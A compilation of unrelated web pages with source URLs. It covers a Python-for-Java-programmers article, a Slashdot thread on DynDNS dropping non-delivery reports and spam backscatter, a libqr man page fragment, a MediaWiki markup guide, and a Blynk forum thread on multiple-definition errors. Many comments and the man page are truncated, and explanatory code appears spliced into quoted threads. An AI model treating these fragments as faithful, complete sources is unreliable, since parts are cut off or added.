Several times now, I’ve put functions and even regular code at top level, outside of any class. That’s allowed, but the implications are a little subtle. In Python, even the class and def statements are regular code that execute at run time. A Python file executes from the top down, and class and def aren’t special in that regard. They’re just special syntax for creating certain kinds of objects: classes and functions.

Here’s the really cool part. Because classes are objects, and their type is type, you can subclass type and change how it works. Then you can make classes that are instances of your subclass. That’s a little weird to wrap your head around at first. But again, you don’t need to know how it works to benefit from it. For example, Python has no enum block, but it does have an enum module:

```python
from enum import Enum

class Animal(Enum):
    cat = 0
    dog = 1
    mouse = 2
    snake = 3

print(Animal.cat)        # <Animal.cat: 0>
print(Animal.cat.value)  # 0
print(Animal(2))         # <Animal.mouse: 2>
print(Animal['dog'])     # <Animal.dog: 1>
```

The class statement creates an object, which means it calls a constructor somewhere, and that constructor can be overridden to change how the class is built. Here, Enum creates a fixed set of instances rather than class attributes.
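The “subclass type” trick can be shown in miniature. This toy metaclass is purely illustrative — enum is not actually implemented this way — but it demonstrates how a subclass of type can intercept class creation:

```python
# A toy metaclass: subclassing type lets the class statement itself
# be customized. Here we record which attributes the class body
# defined, in definition order.
class RecordingMeta(type):
    def __new__(mcls, name, bases, namespace):
        cls = super().__new__(mcls, name, bases, namespace)
        # The namespace dict also contains dunder entries like
        # __module__; skip those and keep only user-defined names.
        cls.fields = [k for k in namespace if not k.startswith("__")]
        return cls

class Config(metaclass=RecordingMeta):
    host = "localhost"
    port = 8080

print(Config.fields)  # ['host', 'port']
```

Config here behaves like any normal class, but its creation went through RecordingMeta — the same hook that lets Enum turn class attributes into a fixed set of instances.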
All of it is implemented with plain Python code and normal Python syntax. Entire libraries have been built on these ideas.

Do you hate the tedium of typing self.foo = foo for every attribute in constructors? And then defining equality and hashing and cloning and a dev-readable representation, all by hand? Java would need compiler support, which may be coming with Project Amber. Python is flexible enough that the community solved this problem with the attrs library.

```python
import attr

@attr.s
class Point:
    x = attr.ib()
    y = attr.ib()

p = Point(3, 4)
q = Point(x=3, y=4)
p == q    # True, which it wouldn't have been before!
print(p)  # Point(x=3, y=4)
```

Or take SQLAlchemy, a featureful database library for Python. It includes an ORM inspired by Java’s Hibernate, but instead of declaring a table’s schema in a configuration file or via somewhat wordy annotations, you can write it directly and compactly as a class:

```python
class Order(Table):
    id = Column(Integer, primary_key=True)
    order_number = Column(Integer, index=True)
    status = Column(Enum('pending', 'complete'), default='pending')
    ...
```

This is the same basic idea as Enum, but SQLAlchemy also uses the same hooks as property so you can modify column values naturally.

```python
order.order_number = 5
session.commit()
```

Finally, classes themselves can be created at run time. It’s a little more niche, but thriftpy creates a whole module full of classes based on a Thrift definition file. In Java, you’d need code generation, which adds a whole new compilation step that can get out of sync.

All of these examples rely on Python’s existing syntax but breathe new meaning into it. None of them do anything you couldn’t do in Java or any other language, but they cut down on structural repetition — which makes code easier to write, easier to read, and less bug-prone.

Wrapping up

Python has a lot of the same basic concepts as Java, but takes them in a very different direction and adds some entirely new ideas.
Where Java focuses on stability and reliability, Python focuses on expressiveness and flexibility. It’s an entirely different way to think about imperative programming.

I doubt Python will replace Java for you in the spaces where Java excels. Python probably won’t win any speed contests, for instance (but see PyPy, a JITted Python). Java has native support for threads, whereas the Python community largely shuns them. Very large complex software with a lot of dusty corners may prefer the sanity checking that static typing provides (but see mypy, a static type checker for Python).

But perhaps Python will shine in spaces where Java doesn’t. Plenty of software doesn’t need to be particularly fast or parallel, and then other concerns float to the surface. I find it very quick and easy to get a project started in Python. With no separate compilation step, the write/run loop is much quicker. The code is shorter, which usually means it’s easier to understand. Trying out different architectural approaches feels cheaper. And sometimes it’s fun to just try out stupid ideas, like implementing goto with a library.

I hope you’ll give Python a try. I have a lot of fun with it, and I think you will too. Just try not to treat it as Java with all the types hidden from you.

Worst case, there’s always Pyjnius, which lets you do this:

```python
from jnius import autoclass

System = autoclass('java.lang.System')
System.out.println('Hello, world!')
```
https://www.sitepoint.com/python-for-java-people/
DynDNS Drops Non-Delivery Reports

jetkins writes "In an email to subscribers, DynDNS announced that they will no longer deliver locally generated non-delivery reports (NDRs) from any MailHop systems. MailHop is a multi-faceted service offering in- and outbound relay services, spam and virus filtering, and store-and-forward buffering. DynDNS makes it clear that they are aware that this goes against RFC 2821 Section 3.7, but explains that in their opinion the increase in spam volume, and the use of NDRs as a spam vector, means that the value of NDRs is now far outweighed by their potential for harm. (DynDNS also points to the far greater reliability of email systems now than when the RFC was approved.) The company notes that other ISPs have quietly dropped RFC 2821-compliant NDRs. Will their public move start a flood (mutiny) of ISPs following suit? Should they have made efforts to have the standard changed instead of defying it?"

Finally, a service provider with a clue... (Score:5, Informative)

Re:Finally, a service provider with a clue... (Score:5, Informative)
A properly-configured endpoint server should check addressee validity during the SMTP exchange, and reject the transfer before it even gets into the system, so the spammer's attempt goes nowhere and "Joe" doesn't get an unwarranted NDR. Of course that doesn't help proxy providers like DynDNS, unless they have some way of authenticating their clients' valid addresses in real time via a direct connection or regular updates.

Re: (Score:3, Insightful)
"If you think you can create a foolproof system, you are one of the fools" - No idea who I'm misquoting.

Re: (Score:3, Insightful)
We already moved from SMTP to ESMTP. Maybe we can go a step further, with, I don't know, ASMTP or whatever you want to call it. Then impose extra controls on messages that arrive via SMTP or ESMTP.
In any case, there is absolutely nothing we can do about zombies, unless you want to implement some kind of "are y Re:Finally, a service provider with a clue... (Score:5, Interesting) Bunk. Even if it was true, it's still no excuse for ignoring your responsibilities. I run the mail servers for several domains, and brute-force attacks just don't happen. It's fairly obvious why, if you think about it. Dictionary attacks against common names are possible, but I've not seen evidence to suggest that's happening. Firstly, I want to get back to "responsibilities". By this I mean that anyone who's connected to the internet has a basic responsibility to make at least a good-faith attempt to prevent their system being used against other people. This goes doubly for people who intentionally run publically accessible servers (e.g. mail servers and web servers). You should treat any mail system which indiscriminately generates NDRs the same way you'd treat an open relay, because that's effectively what it is. You are deliberately making a server available which will accept mail from anyone on the internet, and send it to anyone else on the internet*. This is reckless irresponsibility. * - most NDR messages include at least part of the original message's text; at the very least, the subject line. So a system which generates backscatter does in fact carry some payload chosen by an anonymous third party. Even if brute-force attacks on your mail server's address list do occur, there are ways to mitigate the effects of it that don't turn your system into a spam engine. Having a look through the last 48 days logs on one of my servers, there's 2,308 addresses which were rejected because they're non-existent. The vast majority are either formerly valid addresses (i.e. of people who used to work here), or slightly mangled versions of valid addresses (presumably badly parsed). 
Particularly common are things starting with "3D" (presumably parsed from quoted-printable data which contains =3D) or people's surnames (smith@example.com) -- our email addresses are in the format firstname.lastname@example.com, and it would appear that some harvesters consider periods before the @ to be invalid. The second part highlights why brute-force is impractical: the namespace before the @ is absolutely massive, and only a tiny fraction will be valid addresses. If you have no idea what format email addresses in the target domain take, you have no choice but to try everything, and that will take far longer than a week. Add to this the proliferation of very small domains with only a handful of email addresses (i.e. personal domains, promotional domains). Even with a vast botnet, trying to harvest addresses by brute force against a mail server is so horribly inefficient as to not be worthwhile. There's much easier ways to harvest addresses. Then there's technical issues with that kind of harvesting. First, any reasonable mail server will start responding slower to a client which is making repeated errors, before finally shutting them off. This means you have to make lots of connections. Second, brute force or dictionary attacks stick out like a sore thumb versus normal mail traffic, making it trivial to block any IP which is trying to harvest addresses in this manner. The only possible way to do these sorts of attacks would be to use a vast distributed botnet, and even then it's not going to work. It would be easy (and fun) to build a system that watches for such attacks and blacklists any IP involved. Anyone harvesting in this way would then be betraying the IPs of most of their bots during the harvest! Then there's lots of clever things one can do: once you have a known harvester, start okaying its invalid addresses and add them to your list of spamtraps. Not only is the spammer not collecting any valid addresses, but you're poisoning their address list! 
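The watch-and-blacklist idea from this comment can be sketched in a few lines (the threshold and the IP address are made up for illustration; a real MTA would do this in its connection-handling layer):

```python
from collections import defaultdict

INVALID_LIMIT = 5              # hypothetical cutoff
invalid_rcpts = defaultdict(int)
blacklist = set()

def on_invalid_rcpt(ip):
    """Called each time a client IP tries a nonexistent recipient."""
    invalid_rcpts[ip] += 1
    if invalid_rcpts[ip] >= INVALID_LIMIT:
        blacklist.add(ip)      # this IP is harvesting; drop its connections

# A host probing five bogus addresses gets itself blacklisted:
for _ in range(5):
    on_invalid_rcpt("203.0.113.7")
print("203.0.113.7" in blacklist)  # True
```

From here, the poisoning trick the comment describes is one step further: once an IP is blacklisted, start answering its invalid recipients with "250 Ok" and feed those addresses into your spamtrap list.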
Brute-force attacks are too easy to detect, and too easy to use against the attacker. There's much, much easier and more efficient ways to harvest email addresses. Possibly it could be used if you're targeting a specific company or domain and can do some research into their configuration, but even then there Re: (Score:3, Informative) Ignoring a problem isn't the same as fixing it... NDRs serve a useful purpose assuming the original message was actually useful. The problem isn't sending out NDRs. The problem is sending an NDR in response to spam! I've had to deal with the whole joe-job+NDR+DDOS scenario on several occasions... I have found that 65~80% of th Re: (Score:2) I'm certain you've seen the syndrome: Speak to the business owner and his management team about the problem in easy-to-understand terms, and their eyes glaze over Re: (Score:3, Interesting) What I'd like to see... (Score:2, Interesting) Re:What I'd like to see... (Score:5, Insightful) Re: (Score:3, Insightful) Re: (Score:2) In order to spoof a remote IP address you'd have to basically have to share a wire someplace between the mail server and your spoofing target, or exploit some secondary flaw on a router/host along that same path. It could be done, but there are easier ways to DoS, and most of those ways are effective beyond the single-host-to-single-mailhost-for-mail-service-on ly scope that is targeted with the attack y Re: (Score:2) That's a non-trivial attack though -- it's not as though you can send mail with uni-directional traffic. You don't have to send mail with unidirectional traffic. You just have to make sure that the traffic doesn't point back to you. In other words, if you send mail from a botnet, you're still free and clear as long as you don't use too much of your botnet at once. Re: (Score:2) I'm not suggesting you couldn't get some box other than your own desktop blocked, or that blocking by IP would be effective at stopping spam. 
I was just refuting the original statement that you could use IP-scoped blocking in r Re: (Score:3, Insightful) I wouldn't probably think to check a forum for an announcement on a free-shipping sale or a closeout on last year Re: (Score:2) I do that. (Score:2) After X failed addresses, block the sender. Except you have to make exceptions for things like gmail and hotmail and other major ISP's and mail delivery services. Instead of sending and NDR though, I just reject at SMTP time. If the ISP's were a bit smarter, they'd see X rejections (5xx-series) and shut down ALL outbound email from that account. And I want a pony and a plastic spaceship and RFC-Ignorant.org (Score:5, Interesting) Stupid bastards. Re: (Score:3, Insightful) Re: (Score:3, Insightful) Re: (Score:2) It's easier to get forgiveness than permission, I suppose. Re: (Score:2) Based on a 4-digit SlashID, I'd say not... Re: (Score:2) Re: (Score:3, Informative) Why are you accepting a message for a nonexistent user in the first place? As soon as the sending SMTP connection specifies RCPT you should be able to check if it is valid and terminate the connection if it is for a nonexistent user. This can all be done before the DATA command is issued. Why waste cycles virus scanning, spam screening and bouncing a message for a user you don't even have? You're not just RFC ignorant, you're ignorant of how to properly run a mail server! Note that the method above get Re: (Score:3, Insightful) Re: (Score:2) Possibly, but it does prevent the backflow DOS problem. Re: (Score:2, Informative) Re:RFC-Ignorant.org (Score:4, Insightful) So USE that information. (Score:5, Insightful) #1. The spammer already HAS the account name and is checking to see if it still works. Defeat this by generously distributing SpamTrap accounts. And accepting email to them. And then opt'ing out of the email that they receive. #2. The spammer is trying to guess a new name. Good luck with that. 
Sure, maybe SOMEWHERE there is an email account of "frank@example.com" but good luck finding it. If you want to have some FUN, watch your logs for examples of this. Then setup some of them as SpamTraps. And follow #1 above. I use both of these approaches. It makes filtering spam VERY easy. Re: (Score:3, Insightful) If someone is going to pull off a dictionary attack against the SMTP server, then you just discard connections to them after a specific number of invalid users. Almost all mainstream MUAs support this sort of thing now. At the end of the day, if you actually accept the message for delivery and later reject it, you should do so silently. Re: (Score:2) That works real well when the incoming e-mail is a complaint to sexual harassment anonymous hot line and the sender thinks the e-mail went through, but we silently dropped it due to a mistake on the spelling. I hate sending and e-mail and having no idea if it ever went through or not. So I setup all my outgoing e-mail to have delivery and read receipts to try and discover lost e-mail. Re: (Score:2) If the incomming e-mail is actually an anonymous complaint then there's no way to actually notify the sender in any event, is there? The best case would be the receiving MTA rejecting it immediately because it was mispelled, but if it doesn't, how do you expect it to talk to the original sender anyway Re: (Score:3, Informative) Re: (Score:3, Insightful) Re: (Score:3, Informative) Re: (Score:2) Many ISPs block 25 outbound to be good netizens and avoid their lusers'botnets spewing spam. Legit users can get the block lifted. Re: (Score:3, Insightful) Re: (Score:2) Re: (Score:2) Actually in this case it doesn't matter. If all email addresses @example.com are indeed mapped to your (valid) real email address, then foo@example.com IS valid, as far as the mail Re: (Score:2) Outright NDR ban is just plain stupid, akin to curing headaches with guillotine. 
If they must do something, why not place a cap and delay on the NDR traffic.

Re: (Score:2)
Yes

Re: (Score:2)
I'm not one of the people that shouts how "email

Re: (Score:2)
Probably. The concept is nice, but I get scores of them every day from ignorant mailservers telling me that the spam that I didn't send, but had my address on it, didn't get delivered. I filter them off into a folder, which frankly, I just purge every week or so. I don't have the time to read through them.

Re: (Score:2)
NDR ban sounds like a solution in search of a problem which will hurt legitimate users if this thing catches on.

Re: (Score:2)
Frankly, this article has me considering the possibility of refusing/blackholing NDRs on my own servers. I'm betting it might drop nuisance mail by as much as 5-10%

Re: (Score:2)
Utterly retarded idea, and an utterly worthless list.

Change or Defy (Score:4, Insightful)
If an RFC said all boxes should have a port that users could telnet into with root access, and people started abusing it, would you leave it and wait for the standard to change?

No (Score:2)

Re: (Score:2, Insightful)
By "abbreviated," I mean mail servers should look at incoming apparent NDRs, drop most of the message content, and provide summary information instead. So instead of getting a fake NDR with a SPAM payload, you'd get something like "Your message addressed to fakeaddress@someplace.com, with subject beginning 'First three words,' could not be delivered."

SPF?

Re: (Score:2)
Granted, you can pick up a lot from logs, but not all

Re: (Score:2)
Your email will go into a catchall mailbox and it will be forwarded to the appropriate person. Yes this is tedious, however 1 missed email could be a missed chance at *TONS* of business. Often times people won't email you again if they get an NDR back.

Re: (Score:2)
If SPF were more widely implemented, or required to be implemented, wouldn't this problem be solved? Yes.
Don't send NDRs to domains without SPFs or when SPF fails.

A fair point.. Welcome to 2007. I hate to say it, but this is the state we're in. When I used mailhop, I used it for secondary MX, so I would not really have cared too much about the off chance that when my primary MX was down, you sent mail with a typo in the To address. Failure recovery doesn't need to be 100% perfect for me to appreciate having it.

I like SPF a lot... (Score:2)
That said I DO wish more people would use it so that its overall impact would be increased (as people began to rely on it more). TMDA aside (which has a whole batch of problems, I know) it's my next

Re: (Score:2)
"If I typo an email address, I damn well better be getting an NDR from the recipient domain," And if your typo matches a real person's email, you won't be getting an NDR. Heck, I've gotten tons of email from people who have sent their stuff to the wrong person - including the new password for someone whose name misses mine by one letter. If the mistake originated with you, don't expect someone else to take responsibility for fixing it.

Re: (Score:2)
No, SPF/Sender-ID are bad ideas, which even their creators don't put much trust into. Don't believe me? Try sending a brand-new newsletter to Hotmail and MSN subscribers. Make sure all your Sender-ID and SPF records are in place and verified with Microsoft's own Sender-ID checker. Make sure all your WHOIS data is current, valid and not obfuscated for privacy. Setup your mail servers on freshly-allocated

Re:
Which is why you run a real secondary MX that can either do recipient callout or use valid recipient lists in order to reject during SMTP. DynDNS is a che

to defy the laws of tradition (Score:5, Insightful)
maybe by defying it, the standards will now be reviewed, and eventually changed.

Re: (Score:2)
And your daily lesson in passive aggression comes to you from chef_raekwon today. Not very Wu of him, if you ask me.
Re: (Score:2) RFC (Score:2, Funny) Re: (Score:2) The Problem Is Not NDR's (Score:5, Insightful) The main problem is a you have a system based on blind trust. Second trust based duct-tape systems are simply too cumbersome for the average user. I don't have the answer but I do know that email in it's present state is broken. Start at the top, with secure DNS. (Score:2) Re: (Score:3, Informative) Way to confuse envelope-from, header-from and reply-to. Besides, my home-brewed Linux-based mail server has a published SPF record, and anyone receiving mail can verify that machine is entitled to generate envelope-from with that domain. The SPF also spells out my relay provider, since my DSL line is in DSL blocklists. What it really needs, at the least, is for people to stop accepting bogus HELO/EHLO addresses and other unverifiable envelope information. If there isn't even an A record for the HELO ad Re: (Score:2) Re: (Score:2) I'm reposting this to make certain that if one point gets made here, this is it. Re: (Score:2) E-mail works fine, with the various hacks that have been added on to fight entropy. Dealing with normal spam is no worse than the annoyances of closed networks - you still get spam on facebook etc! Compare and contrast e-mail with the alternatives - you get instant messaging, which solves a different problem and *still* sucks, or you place yourself at the mercy of a third party. No thanks. If you can't use e-mail chances are you don't: Run an well configured server (or pay an insignific Re: (Score:2) Re: (Score:2) I have an answer (Score:3, Insightful) Yeah, whiners on Slashdot say CAN-SPAM is horrible, because it legalizes spam. What they forget is that CAN-SPAM only legalizes it under certain rules, which spammers are ignoring because there's no enforcement. According to this article from last year [techweb.com], only 0.27% of all junk mail actually complies with CAN-SPAM, which means the other 99.73% is clearly illegal. 
On top of that, the 0.27% is deliberately easy to filter out i Re: (Score:2) Then if for whatever reason it has to be email, rather than courier, fax, snail mail, in person, etc, you could always pick up the phone and ask for verbal confirmation of receipt, or assume that not getting a reply confirming receipt is evidence of non-delivery. Anyone who blindly relies on email (or anything else) being delivered, received, understood and acted upon correctly for a critical business venture without some kind of conf Re: (Score:2) Standards and Implementation (Score:5, Insightful) Going against standards can cause a bit of chaos as well, which is why it's good to avoid deviation - but sometimes a deviation makes sense, and you do it. Publicly announcing this (non-critical) deviation, and explaining exactly why, is the proper way to go about it. Re: (Score:3, Insightful) The process of modifying standards is a bit more complex [rfc-editor.org] than that, but there is a process for change. You just have to become part of it rather than just picking and choosing which standards annoy you the least and then hoping that someone else will fix the ones that don't work the way you think they should. Re: (Score:2) I tend to differ... What they're doing is making a change to a service that they provide so that their problem is resolved (which they have a right to do IMO). It's kind of a move towards an 'ignorance-is-bliss' policy rather than fixing a problem for their customers... after all, if they aren't aware of a spam problem that their customers are experiencing then there isn't a spam problem. I'm a f Turn off original message in the bounce??? (Score:3, Interesting) This is how it goes on all our mail servers. All bounced messages have the original content stripped off. You get the error message with the reason the message bounced and that's it. NDR are still usefull. There is PLENTY of mail servers not configured properly or messed up on the Net, even from big ISPs. 
Calling the current system as a whole, reliable, is a joke.

Re: (Score:2)
Basically, our spam law says it's illegal to send unsolicited commercial e-mails to private individuals - there's nothing to say that you have to be the author of the spam to fall foul of that law, you are still guilty if you send me an unsolicited commercial e-mail by bouncing it to me from a third party when I'm being joe-jobbed. A nicely worded 'please change your settings, or I'll tell the information commissioner to fine you £5,000 per m

Re: (Score:2)
NO. Once a spam MO becomes commonplace, that technique will NEVER go away. You seem to be implying that if the "effort" is wasted in vain, then spammers will deprecate their old technique. They won't - they'll just ADD new techniques. The NDR loophole will never die.

Long deprecated in practice (Score:2)

not all sending servers can generate NDR (Score:2)
sendmail and Postfix both do this. Don't know about MS Exchange or Courier. A default qmail install (without patches) certainly doesn't. I believe there's a patch to implement this.

Are DynDNS cluebies? (Score:5, Insightful)
Excuse me, but due to the vast amount of spam handling, modern e-mail systems are substantially less reliable than they used to be. If you redirect email for your domain name to Hotmail, chances are good that it will disappear without a trace. (No NDR, not in the spam box either.) Someone else already mentioned the problem of people typoing email addresses. This is a common problem. Email can be bounced for other reasons, too, such as a full mailbox, or that there is a relaying mail server (yes, DynDNS, they still exist, and in abundance!) which gives up on delivery after a week of timeouts for the destination host. And so on. Someone at DynDNS needs a good whack with the clue bat.

Re: (Score:2)
If you have a DynDNS account, chances are good that you don't forward all your e-mail to a HotMail [live.com] account.
In fact, you might run your own mailserver; in that case, you can make sure that your own server returns whatever bounce messages you feel are appropriate. Even the forwarding service will normally be pointed at RFC-compliant servers, which may c

Problem is legitimate, solution is not (Score:2, Interesting)
First, by their own admission this is only a serious problem for what they call their MailHop Backup MX service. Their other services, MailHop relay and forward, are "mostly immune" to DSN issues.

Re: (Score:2, Insightful)
Not necessarily. Backup MX services could do address validation if they're given a userlist. Of course, this entails some security concerns (example: why trust a backup service with a userlist?), but that can be figured out satisfactorily (answer: use a backup service you can trust, and engineer a secure solution). Further thoughts: There is little reason to avoid address validation these days. As for the argument against address validation --

Bad idea (Score:2)
Unilaterally deciding to ignore an RFC (or part of an RFC) just because you don't like it is almost never a good idea. When Microsoft does it, everyone (correctly!) gets up in arms. DynDNS shouldn't get off any easier. At most, I would agree with a temporary block of NDRs to a particular user or domain if a large joe-job run is recognized. But this should never be made permanent or blanket.

Having read TFA... (Score:2)
The problem is one of architecture. There is no excuse in the modern world for running a secondary MX server that lacks knowledge about local recipient addresses. While this architecture may have been OK 10 years ago, it no longer is. Just don't run a secondary MX unless you have a way to transfer your account list to the secondary in a way that the secondary can have local knowledge of valid addresses even if the primary is unreachable.

NDR's are not evil (Score:5, Insightful)
The problem is that their servers *accepted* the message that eventually had to be NDR'd in the first place, then after accepting responsibility, decided they didn't want that responsibility, so discarded mail that they promised they would deliver. If their servers checked validity of local recipients, scanned and filtered the message, etc BEFORE accepting it (via 2xx series SMTP accept response), and instead properly REJECTED it with a 5xx series response, these messages would never be bounced. The NDR mechanism is not at fault - rather, the fact that they can't properly configure their servers to reject the message up front is at fault. If you properly REJECT the messages at the SMTP level instead of accepting the message for delivery, the only thing left to NDR are perfectly valid cases, such as mailbox over quota, etc. Once you *accept* responsibility to deliver a message (via a 2xx series SMTP response), you MUST deliver it somewhere, else you have shirked your responsibility - either deliver it to it's destination, or bounce it. To do anything else would be to LOSE mail, which is the ultimate sin of any mail server. The key is not to throw out bounce messages, but to minimize or eliminate unnecessary bounces in the first place by rejecting instead. Note that by properly REJECTING the message, you also effectively defeat most spam bots, since they can't "bounce" the mail that you reject to the "real" local sender. I always hate it when providers like this take the short cut of *losing* mail intentionally rather than fixing their broken systems to work right. One caveat to my comments - unfortunately, some mail software is symply not geared toward todays Internet, such that it can do the scanning and filtering of messages realtime fast enough to prevent a sending server from timing out while it's doing this scanning, so they queue the mail to process it for spam, etc later. 
Using such software is the first mistake most places make, and is the real reason why there are so many NDRs in the first place.

Re: (Score:3, Insightful)
A similar problem occurs when you submit outbound mail to your ISP -- unless it's going to someone else at the same ISP, the local SMTP server can't verify that delivery will succeed. At the ISP level it's still probably reasonable to generate bounce messages, at least for local users. That way you don't have to do the final delivery right away, users can still get error messages, and you don't risk sending

If email is so reliable these days... (Score:2)
High-availability systems generally accept degraded performance in a double-fault situation. Really, email only needs to rise to the level of "high-availability" (as opposed to "fault-tolerant"), given users' current expectations. If you need anything better than that, users generally rely on "layer 8" (human) acknowledgment (largely b

Good for DynDNS; TZO.COM did this 3 months ago (Score:2)
This step might not have been necessary if everyone customized (read: FIXED) their Microsoft Exchange installations, but that's never going to happen. TZO stated that 80% of outbound relayed mail was DSN from spammer attempts. With a lot of Exchange installs, even if that server is NOT an "open relay", they WILL send out DSNs for spam relay attempts. NO mail server should send out DSNs for domains that are not their own - just reject it up front. Unfortunately tha

POTS (Score:2, Insightful)
https://tech.slashdot.org/story/07/08/24/1931224/dyndns-drops-non-delivery-reports
#include <lqr.h>

The first one must only be used on the LqrCarver objects created with lqr_carver_new, i.e. with 8-bit images, while the second one is general, but the rgb pointer must be cast to the appropriate type to be used (i.e. pass the address of a pointer to void to the function lqr_carver_scan_line_ext, then cast it to a pointer of the appropriate type and use this last one for reading the output).

Use the function lqr_carver_scan_by_row(3) before calling these to know whether your image will be scanned by row or by column.

These functions return TRUE in case the readout is successful and the end of the image was not reached, FALSE otherwise. If lqr_carver_scan_line is called over a non-8-bit LqrCarver object, it will return FALSE.

LqrColDepth(3), lqr_carver_scan_reset(3), lqr_carver_scan(3), lqr_carver_scan_by_row(3)
http://www.makelinux.net/man/3/L/lqr_carver_scan_line_ext
MediaWiki User Guide/Print version

This is a user guide to MediaWiki, the software that runs Wikipedia, Wikibooks and other Wikimedia projects. The book focuses on MediaWiki markup. Topics out of scope of the book include administration and development of MediaWiki.

Contents
- 1 Text Formatting
- 2 Hyperlinks
- 3 Sections and Headings
- 4 Lists
- 5 Tables
- 6 Images
- 7 Categories
- 8 Templates
- 9 References
- 10 Mathematics
- 11 Namespaces
- 12 Glossary

Text Formatting

Text formatting can also be done using HTML and CSS. Some of the most useful HTML elements are: Some HTML elements are not allowed, such as A and IMG.

Source code

Hyperlinks

There are two types of hyperlinks in MediaWiki: internal, also called wikilinks, and external.

Internal hyperlinks

External hyperlinks

Redirecting.

Sections and Headings

Headings are created using sequences of "=" characters, placed before the heading title and after the heading title, on the same line. The level of headings is determined by the number of "=" characters. Examples:

Start level: 2. Do not use headings of level 1, such as "=Title="; start with level 2 instead. The heading at level 1 is used for the title of the page.

Maximum level: 6

Depending on the convention that users and editors adopt, there can be any number of spaces between the "=" characters and the title. An example without spaces: ==Plants== An example with spaces: == Plants ==

Table of contents

There is no simple way to make a heading not appear in the table of contents. For a complex way requiring the adjustment of the MediaWiki software, see Meta:Help:Section.

Customizing TOC

There are various ways to customize the table of contents. For instance, to place it to the right, use:

<div style="float:right; clear:both; margin-left:0.5em;">__TOC__</div>

Editability of sections.

Lists

Lists formatting: Bullet lists: Numbered lists: Definition lists: Mixed lists: Lists inside tables:

Tables

Tables:

{|
|+ Caption of the table
! Heading 1
! Heading 2
|-
| Cell 1 in row 1
| Cell 2 in row 1
|-
| Cell 1 in row 2
| Cell 2 in row 2
|}

Dense format:

{|
|+ Caption of the table
! Heading 1
! Heading 2
|-
| Cell 1 in row 1 || Cell 2 in row 1
|-
| Cell 1 in row 2 || Cell 2 in row 2
|}

Lists in tables:

{|
! Heading a
! Heading b
|-
|
* a1
* a2
|
|}

Images

MediaWiki supports the use of images in various formats. In order to be used in a wiki, an image first needs to be uploaded, to which we come later.

Placing images

The following is an overview of placing images into pages, images that have already been uploaded.

Location:
- 'right'
- 'left'
- 'center'
- 'none'

Galleries

Images can be put into a gallery as follows. Notice the absent "[[" and "]]" around the names of the image files.

<gallery>
Image:name_1.png
Image:name_2.jpeg
</gallery>

Images in galleries can be given captions, as follows.

<gallery>
Image:name_1.png | Caption 1.
Image:name_2.jpeg | Caption 2.
</gallery>

Uploading images

Categories

A wikilink to a category needs to start with ":", such as

See also [[:Category:Birds]]

Otherwise, the page is put into the category instead of linking to it, and the wikilink is not shown.

Templates

Templates are transcluded using "{{" and "}}".

Parameters

Control structures such as if and switch are available, if the ParserFunctions extension of MediaWiki is installed.

Transcluding any page

Mathematics

To get started, follow the examples below.

Greek and symbols

There is a way of marking up Greek characters and special symbols, as the following table shows.

Namespaces.

Glossary

This is a glossary of the book.

C
- category - TODO

N
- namespace - The part of the name of the page before the first ":".

P
- piped link - An internal link or interwiki link where the link target and link label are both specified.

W
- wikilink - An internal link; a link pointing to another page of the same wiki or knowledge base, marked up using [[target word]], contrasting to links to other web sites.
- wikitext - Text containing wiki markup, such as '''text''' for boldface.
https://en.m.wikibooks.org/wiki/MediaWiki_User_Guide/Print_version
When I #include the Blynk libraries from more than 1 module, I get multiple definitions at compile time. How can I get the Blynk declarations into a second or third module, without multiple definitions?

[SOLVED] Multiple #include across IDE tabs causing multiple definition errors

Blynk multiple definitions

Arduino IDE, PlatformIO, Tabs and other programming options

Can't call Blynk from a class file

What do you mean by module?? You should only need to declare Blynk once based on your device/connection type. e.g.

#include <BlynkSimpleStream.h>   // for USB
#include <BlynkSimpleEsp8266.h>  // for ESP
#include <BlynkSimpleEthernet.h> // for Ethernet

But NOT more than one at a time.

A module (in software) is a .cpp or other language code file, possibly paired with a definitions file (.h). My project is large enough that I've divided it into several modules. The .ino file is the main program with various related functions grouped into their own files. Each of them gets compiled by itself, then they are linked together into the complete hex file that gets uploaded to the Arduino. It is the linking process that draws the error message; it finds two objects with the same name where there should only be one.

Well, I can't say that I am completely following you on the separate "module" explanation… is that similar to multiple tabs in the IDE? Either way, it is probably beyond my current programming knowledge. Can you provide more details… and you may have to show the code for others to grasp what you are trying. When posting code, please format it as shown here.

Yes, when there is more than one file in a project, each one is shown in a separate tab. In my project, the .ino file's 'loop()' function looks like

void loop(void) {
  Timer.run(); // update timers
  Fsm.run();   // dispatch events
  Blynk.run(); // update Blynk
}

, plus it opens the connection to the Blynk server.
Another module (file) needs to call Blynk to update a variable it manages:

static SMRESULT_T afUpdTemps(SMEVENT_T event) {
  char fxbuf[9+1];
  q12p4toa(fxbuf, TemprSm[0]);       // conv value to string
  Blynk.virtualWrite(VTemp1, fxbuf); // send to Blynk
  return( Success );
}

The trouble comes when two files both try to

#include <BlynkSimpleShieldEsp8266.h>

The declarations in the #included .h file are needed in each source file to compile its references to the Blynk library, but it appears that the included file(s) also define a Blynk instance, leading to the multiple definitions. If that is the correct interpretation, the library should let the project define the Blynk instance(s) it needs.

OK, I have adjusted your title to better reflect the issue. There are some good programmers out there who might know what to do.

I think in Arduino the Tabs option is a really dumb implementation from their side. It just concatenates all files. You can use the IFDEF statement I think to check if a module is already defined or included.

I've updated post #3 to go into more detail and tweaked the title. I'm not looking for a work-around for this; I already have that. I'm hoping the library will get fixed to prevent the issue in future. I probably should have posted this in Issues and Errors - my bad.

For future readers: One work-around is to assign one, and only one, of the modules as the Blynk interface. Only that module #includes the Blynk library or libraries you need, and it contains the only functions that directly talk or listen to Blynk, including helper-functions that you write specifically to communicate with Blynk on behalf of code in your other modules. It is awkward, because you lose some of the flexibility inherent in the design of Blynk's library entries, unless you re-invent it in your helper functions.

It all ends up on the same forum… but this doesn't sound like a Blynk specific issue.
Do all other libraries allow multiple repeat #includes across tabs without the IFDEF option as @Lichtsignaal suggested?

it is not dumb, if you know how it works and what it does (indeed, it just concatenates all files, in a specific order). i use it all the time if a project is larger than 1-2 pages. personally, i have a:
- main file (global variables, object inits, main loop comes here)
- a "header" file (here goes all the includes and defines)
- then a separate file for every function (even for void setup)

i simply can not imagine how to handle a larger project without tabs in arduino ide… with tabs, one can organize the code really well, and it results in a much cleaner interface. of course, you can not compare the arduino ide with jetbrain ides, but until someone comes up with a usable + easily configurable + smart ide for arduino, this is the best we can use. for some time i used clion with arduino plugin, but it never worked flawlessly, and it was a pain in the ass to set it up…

@wanek Good reference article. Barely a few paragraphs in and I already found mention of this OP issue: Essentially, you should only keep all variable definitions, setup() and loop() in your main .pde file, and disperse all your functions into their separate .pde files…

